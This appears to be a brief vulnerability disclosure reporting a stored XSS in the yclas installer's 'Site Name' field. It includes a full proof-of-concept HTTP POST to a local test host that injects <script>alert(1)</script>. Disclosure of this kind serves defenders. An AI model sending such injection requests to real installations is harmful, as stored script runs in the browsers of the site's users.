yclas-xss1
STATIC XSS (PERSISTENT XSS)
https://github.com/yclas/yclas
Install/View/Form.php accepts javascript in the "Site Name" field and does not sanitize input, saving the information in the database.
POST / HTTP/1.1 Host: 0.0.0.0:8081 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, ext/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 338 Origin: http://0.0.0.0:8081 Connection: close Referer: http://0.0.0.0:8081/ Cookie: PHPSESSID=; theme=87a24f00f25f75f91eeacce8f9f24ae285233db5~atlantic-lite; session= LANGUAGE=en_US&DB_HOST=localhost&DB_NAME=openclassifieds1&DB_USER=root&DB_PASS=kali&SAMPLE_DB=on&DB_CHARSET=utf8mb4&TABLE_PREFIX=yc4_&SITE_URL=http%3A%2F%2F0.0.0.0%3A8081%2F&SITE_FOLDER=%2F&SITE_NAME=<script>alert(1)</script>&TIMEZONE=America%2FLos_Angeles&ADMIN_EMAIL=testemail@test.com&ADMIN_PWD=test1234&HASH_KEY=
SCREENSHOTS AVAILABLE IN THE REPO FILES
DISCOVERED BY NATHAN JOHNSON ON 8/15/2021